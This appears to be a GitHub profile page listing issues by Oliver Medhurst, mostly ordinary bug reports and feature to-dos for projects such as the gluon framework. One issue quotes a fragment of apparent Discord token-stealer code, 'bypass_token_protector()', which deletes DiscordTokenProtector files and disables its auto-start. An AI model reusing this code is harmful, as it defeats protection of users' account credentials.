Oliver Medhurst

Results 99 issues of Oliver Medhurst

Hey, nice project. When trying to compile for WASM with `cargo build --features wasm-exports --release`, I get these errors. Couldn't find it reported anywhere but sorry if already known. ```...

Pressing newline / enter when using it in Firefox (Chrome works fine) does not actually create a newline

[YouTube Playlist](https://www.youtube.com/watch?v=Spux0hLtUSo&list=PLE7tQUdRKcybehOqUuz4tVt-O7fCIPWpq) Resources: - [Contributing Guidelines](https://github.com/EddyVinck/ConfTalks/blob/master/CONTRIBUTING.md#adding-talks) - [Slack](https://join.slack.com/t/conftalks/shared_invite/enQtNzk1MjA1ODQ2NzM3LTRkMmU0YmRhZDEzYmUxZTEyYjhlMWYzOWIyYTU0NDBkMGFlN2U3MjJmNWE5MjM4ZDM1Yzg0M2QwZWUzODllMzM) - [Newsletter](https://emailoctopus.com/lists/b6cc50a1-f282-11e9-be00-06b4694bee2a/forms/subscribe) Notes: - If a talk has not been uploaded you can leave the video_url empty and put in a random...

good first issue
hacktoberfest
review

Most modules are ~8 months old and should be updated frequently as they often are patched for important things like security vulnerabilities.

Todo: - [ ] Add comments: - [ ] (Look for more places to add comments) - [ ] Replace repeated values with variables: - [ ] (Look for more...

impact:documentation
platform:website

The Discord packages used here are very outdated (my guess is over a year) and uses the old update API which gives users a security risk and shouldn't be used,...

bug

Added example which fixes stdout not working when building as a gui app.

```js bypass_token_protector() { for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) { if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) { client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`); } } const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, { encoding: "utf-8" })) token_protector_config['auto_start'] = false token_protector_config['auto_start_discord'] =...

[See `bun` branch](https://github.com/gluon-framework/gluon/tree/bun) - [X] Initial prototype - [ ] Fixing - [ ] Firefox IPC is broken - [ ] Bun examples - [ ] Publish somewhere?

enhancement

[See `deno` branch](https://github.com/gluon-framework/gluon/tree/deno) - [X] Initial prototype - [ ] Deno examples - [ ] Publish to deno.land/x (?)

enhancement